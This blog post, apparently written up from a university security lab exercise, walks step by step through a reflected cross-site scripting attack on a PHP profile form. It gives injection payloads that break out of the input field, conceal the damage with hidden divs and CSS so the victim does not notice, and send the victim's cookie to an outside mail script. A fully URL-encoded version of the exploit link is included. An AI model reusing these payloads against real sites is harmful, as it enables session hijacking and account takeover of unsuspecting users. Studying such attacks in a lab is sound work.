Advertisements
Home > Information Technology, Security > Attack A: Stealing Cookie

Attack A: Stealing Cookie

For an input for in this web:

<form name="profileform" method="GET"
  action="users.php">
 <nobr>User:
 <input type="text" name="user" value="" size=10>
 <input type="submit" value="View"></nobr>
</form>

Assume that a user has already logged in to the website and he found a malicious link which the user click will invoke a sendmail option to send the cookie to the email of the attacker. How will we construct this malicious link?

1. Study the form

Now for all we know if we submit the form, it will go to it’s own page (user.php) and show the profile in this type of fashion:

<form name="profileform" method="GET"
  action="/teaching/10WS/Security/material/projects/project2/peanut/users.php">
 <nobr>User:
 <input type="text" name="user" value="2534130" size=10>
 <input type="submit" value="View"></nobr>
</form>

The important thing to know is the value of the input field will be retyped again in the user input field (see the value parameter). Another important information that the form uses a GET function which will return user.php?user=2534130 in the address bar. Now to exploit it, we will need a vital element called “script”.

2. Invoking script

If you do a <script> tag inside a body of an HTML file without declaring a function, it will be automatically executed just like a normal program. So, let’s test the input that will alert the user’s cookie. Type:

user.php?user=””><script>alert(document.cookie);</script>

This will alert the user cookie right away with an additional of formatting error of the page. This is done so, because, when you type the URL just like that, it will overwrite the user input field to:

<form name="profileform" method="GET"
  action="users.php">
 <nobr>User:
 <input type="text" name="user" value=""><script>alert(document.cookie);</script>" size=10>
 <input type="submit" value="View"></nobr>
</form>

As you can see, we successfully close out our user input field tag and planted our script tag on the web. However, the trailing text will make the page looked like it has been hacked. A good hacker has to maintain stealthiness in compromising security, so let’s take care of that.

3. Cleaning the page

Now we have to overwrite the user input field to emulate the real page so at least the user won’t notice the subtle differences (except when he looked at the address bar). So cover the user input field with this:

users.php?user=”size=”10″> <input type=”submit” value=”View”>

The important thing is that we have now emulate the real page with our own user input field and View button. However, the trailing script also need to be hidden from the user. We can use <!– to comment all the trailing script, but that’s mean we comment until the end of the HTML tag which clearly is not how the original site is design. How about using a <div> tag and set the tag to invisible with display:none as the style? So, here’s our code to clean the page:

users.php?user=”size=”10″><script>alert(document.cookie);</script><input type=”submit” value=”View”><div style=”display:none;” xx=”

Now, the nasty trailing script will be enveloped in the <div> tag which will not be shown in the page. The xx=” is practically doesn’t mean anything since we just want to close the remaining script:

" size=10>
 <input type="submit" value="View"></nobr>

4. Send the cookie by email

Once your stealth attack is ready, you are good to go. Find a sendmail script to send the cookie to your email. I’m using my university sendmail script which look like this:

javascript:void((new%20Image()).src=(‘http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?’%20+%20’to=somestudent@stud.uni-saarland.de’%20+%20’&payload=xyz’%20+%20’&random=’%20+%20Math.random()));

However you can find a dozen of free sendmail script for your comfort in hacking the website. Now, put the script in your code:

user.php?user=” size=”10″> <input type=”submit” value=”View”><style type=”text/css”>.warning{display:none;}</style><script type=”text/javascript”><!–
(new Image()).src=’http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?to=s9sowind@stud.uni-saarland.de&payload=’+encodeURIComponent(document.cookie)+’&random=’+Math.random();
//+–></script><div style=”display:none;” xx=”

the to parameter is the email you want to send the cookie to and the payload is the content of the email which is the document cookie. The random parameter is just a way to avoid caching.

5. Precaution on warning

Some websites maybe could display warning if there is a sql error, so you must also cover that by using:

<style type=”text/css”>.warning{display:none;}</style>

This is to write the CSS class for displaying warning on the page. I do this because in the page it uses a CSS page to give the warning text a red and bold text with:

.warning { color: #A00000; font-weight: bold; }

Now, the warning can be suppressed beautifully.

6. Precaution on user input

To ensure your attacking mode to be a success, you might want to consider URL encoding if the user input field is lightly filtered to avoid quotes, tags, space, and other stuff. Now, convert all the special characters so we could get our url to be like this:

users.php?user=%22%20size%3D%2210%22%3E%20%3Cinput%20type=%22submit%22%20value=%22View%22%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E.warning{display%3Anone%3B}%3C%2Fstyle%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C!–%0A%28new%20Image%28%29%29.src%3D%27http%3A%2F%2Fmail-infsec.cs.uni-saarland.de:8000%2Fsendmail.php%3Fto%3Dsomeone%40stud.uni-saarland.de%26payload%3D%27%2BencodeURIComponent%28document.cookie%29%2B%27%26random%3D%27%2BMath.random%28%29%3B%0A%2F%2F+–%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3B%22%20xx%3D%22

Now, you are set to hack the website, but of course you have to figure a way for the user to click the link first^^

Advertisements
  1. No comments yet.
  1. November 28, 2010 at 9:04 pm

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: